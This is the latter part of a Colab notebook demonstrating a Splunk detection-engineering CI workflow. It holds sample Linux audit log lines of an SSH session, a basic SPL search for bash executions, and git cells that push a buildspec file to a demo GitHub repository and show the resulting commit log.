96 | "type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
97 | "type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
98 | "type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"bash\" exe=\"/usr/bin/bash\" key=(null) \n",
99 | "type=CWD msg=audit(1664132305.181:240): cwd=\"/home/jsmith\"\n",
100 | "type=PATH msg=audit(1664132305.181:241): item=0 name=\"/bin/ls\" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0\n",
101 | "type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n"
102 | ]
103 | }
104 | ]
105 | },
106 | {
107 | "cell_type": "markdown",
108 | "source": [
109 | "# Splunk SPL Dev"
110 | ],
111 | "metadata": {
112 | "id": "ptjMJSzCqQE2"
113 | }
114 | },
115 | {
116 | "cell_type": "markdown",
117 | "source": [
118 | "Use this section to craft out your SPL"
119 | ],
120 | "metadata": {
121 | "id": "uhIPpPN6qxUq"
122 | }
123 | },
124 | {
125 | "cell_type": "markdown",
126 | "source": [
127 | "\n",
128 | "\n",
129 | "```\n",
130 | "index=main exe=*bash\n",
131 | "```\n",
132 | "\n"
133 | ],
134 | "metadata": {
135 | "id": "tEBqqd-Pq1XB"
136 | }
137 | },
138 | {
139 | "cell_type": "code",
140 | "source": [
141 | "spl_search = 'index=main exe=*bash'"
142 | ],
143 | "metadata": {
144 | "id": "tJ34Zr7Bt26R"
145 | },
146 | "execution_count": null,
147 | "outputs": []
148 | },
149 | {
150 | "cell_type": "markdown",
151 | "source": [
152 | "# Send to CI/CD Pipeline"
153 | ],
154 | "metadata": {
155 | "id": "rxnHPC35qT8K"
156 | }
157 | },
158 | {
159 | "cell_type": "code",
160 | "source": [
161 | "#grab github access token\n",
162 | "from google.colab import userdata\n",
163 | "GITHUB_TOKEN=userdata.get('GITHUB_TOKEN')\n",
164 | "print(type(GITHUB_TOKEN)) #verify something is populated"
165 | ],
166 | "metadata": {
167 | "colab": {
168 | "base_uri": "https://localhost:8080/"
169 | },
170 | "id": "JKZqJ2luwdwx",
171 | "outputId": "d5093d6d-eaa7-42cd-eacc-a4c0ab7f124e"
172 | },
173 | "execution_count": null,
174 | "outputs": [
175 | {
176 | "output_type": "stream",
177 | "name": "stdout",
178 | "text": [
179 | "\n"
180 | ]
181 | }
182 | ]
183 | },
184 | {
185 | "cell_type": "code",
186 | "source": [
187 | "#do git session activity\n",
188 | "%cd /content\n",
189 | "!git config --global user.name \"Dennis Chow\"\n",
190 | "!git config --global user.email \"dchow@xtecsystems.com\"\n",
191 | "!git clone https://$GITHUB_TOKEN@github.com/dc401/splunk-integration-test-ci-demo.git\n",
192 | "%cd splunk-integration-test-ci-demo\n",
193 | "!cp /content/buildspec.txt /content/splunk-integration-test-ci-demo\n",
194 | "!git add buildspec.txt\n",
195 | "!git commit -m \"added buildspec\"\n",
196 | "!git push\n",
197 | "!git status"
198 | ],
199 | "metadata": {
200 | "colab": {
201 | "base_uri": "https://localhost:8080/"
202 | },
203 | "id": "3G14hifDqKje",
204 | "outputId": "f01c39a8-6336-4ed4-a817-7f7b4c1d01d7"
205 | },
206 | "execution_count": null,
207 | "outputs": [
208 | {
209 | "output_type": "stream",
210 | "name": "stdout",
211 | "text": [
212 | "/content\n",
213 | "Cloning into 'splunk-integration-test-ci-demo'...\n",
214 | "remote: Enumerating objects: 15, done.\u001b[K\n",
215 | "remote: Counting objects: 100% (15/15), done.\u001b[K\n",
216 | "remote: Compressing objects: 100% (12/12), done.\u001b[K\n",
217 | "remote: Total 15 (delta 1), reused 4 (delta 1), pack-reused 0\u001b[K\n",
218 | "Receiving objects: 100% (15/15), 6.58 KiB | 6.58 MiB/s, done.\n",
219 | "Resolving deltas: 100% (1/1), done.\n",
220 | "/content/splunk-integration-test-ci-demo\n",
221 | "[main 7d8a12f] added buildspec\n",
222 | " 1 file changed, 2 insertions(+)\n",
223 | " create mode 100644 buildspec.txt\n",
224 | "Enumerating objects: 4, done.\n",
225 | "Counting objects: 100% (4/4), done.\n",
226 | "Delta compression using up to 2 threads\n",
227 | "Compressing objects: 100% (2/2), done.\n",
228 | "Writing objects: 100% (3/3), 345 bytes | 345.00 KiB/s, done.\n",
229 | "Total 3 (delta 1), reused 2 (delta 1), pack-reused 0\n",
230 | "remote: Resolving deltas: 100% (1/1), completed with 1 local object.\u001b[K\n",
231 | "To https://github.com/dc401/splunk-integration-test-ci-demo.git\n",
232 | " 7820448..7d8a12f main -> main\n",
233 | "On branch main\n",
234 | "Your branch is up to date with 'origin/main'.\n",
235 | "\n",
236 | "nothing to commit, working tree clean\n"
237 | ]
238 | }
239 | ]
240 | },
241 | {
242 | "cell_type": "code",
243 | "source": [
244 | "#revert from clone if needed\n",
245 | "%cd /content\n",
246 | "!rm -rf ./splunk-integration-test-ci-demo\n",
247 | "!pwd"
248 | ],
249 | "metadata": {
250 | "colab": {
251 | "base_uri": "https://localhost:8080/"
252 | },
253 | "id": "g4IX1qGrydJC",
254 | "outputId": "d5859ad8-28b5-46f0-eb52-ae4b7a5653f4"
255 | },
256 | "execution_count": null,
257 | "outputs": [
258 | {
259 | "output_type": "stream",
260 | "name": "stdout",
261 | "text": [
262 | "/content\n",
263 | "/content\n"
264 | ]
265 | }
266 | ]
267 | },
268 | {
269 | "cell_type": "markdown",
270 | "source": [
271 | "Ensure that you have validated findings based on the CI tests and deployment"
272 | ],
273 | "metadata": {
274 | "id": "AtSoltIyvFvY"
275 | }
276 | },
277 | {
278 | "cell_type": "code",
279 | "source": [
280 | "#check on runner status\n",
281 | "!git log"
282 | ],
283 | "metadata": {
284 | "colab": {
285 | "base_uri": "https://localhost:8080/"
286 | },
287 | "id": "mg4tJmZDxMtU",
288 | "outputId": "046168d0-784c-4238-8ba0-e262f3cf451d"
289 | },
290 | "execution_count": null,
291 | "outputs": [
292 | {
293 | "output_type": "stream",
294 | "name": "stdout",
295 | "text": [
296 | "\u001b[33mcommit 7d8a12f4158b208646ba24d05535a8bb238969e7\u001b[m\u001b[33m (\u001b[m\u001b[1;36mHEAD -> \u001b[m\u001b[1;32mmain\u001b[m\u001b[33m, \u001b[m\u001b[1;31morigin/main\u001b[m\u001b[33m, \u001b[m\u001b[1;31morigin/HEAD\u001b[m\u001b[33m)\u001b[m\n",
297 | "Author: Dennis Chow \n",
298 | "Date: Mon Jan 22 01:34:30 2024 +0000\n",
299 | "\n",
300 | " added buildspec\n",
301 | "\n",
302 | "\u001b[33mcommit 78204483da12ad1e2b39a372f0894564411c9939\u001b[m\n",
303 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
304 | "Date: Sun Jan 21 19:29:02 2024 -0600\n",
305 | "\n",
306 | " Delete buildspec.txt\n",
307 | "\n",
308 | "\u001b[33mcommit fbfee73846d60f8e51b4f602a4c75b5f04d64de2\u001b[m\n",
309 | "Author: Dennis Chow \n",
310 | "Date: Mon Jan 22 01:23:26 2024 +0000\n",
311 | "\n",
312 | " added buildspec\n",
313 | "\n",
314 | "\u001b[33mcommit 55bd18a05a15a7cca1a0f3a9c814a16bf52236ac\u001b[m\n",
315 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
316 | "Date: Sun Jan 21 01:01:03 2024 -0600\n",
317 | "\n",
318 | " Add files via upload\n",
319 | "\n",
320 | "\u001b[33mcommit 4d9101913269461769bd8a8414f9d6ba3322d0ff\u001b[m\n",
321 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
322 | "Date: Sun Jan 21 00:32:35 2024 -0600\n",
323 | "\n",
324 | " Created using Colaboratory\n",
325 | "\n",
326 | "\u001b[33mcommit 2963aea0acbcb8edecb631679f37a93774104242\u001b[m\n",
327 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
328 | "Date: Sat Jan 20 23:46:29 2024 -0600\n",
329 | "\n",
330 | " Initial commit\n"
331 | ]
332 | }
333 | ]
334 | },
335 | {
336 | "cell_type": "code",
337 | "source": [],
338 | "metadata": {
339 | "id": "bNt1x5olzhja"
340 | },
341 | "execution_count": null,
342 | "outputs": []
343 | }
344 | ]
345 | }
--------------------------------------------------------------------------------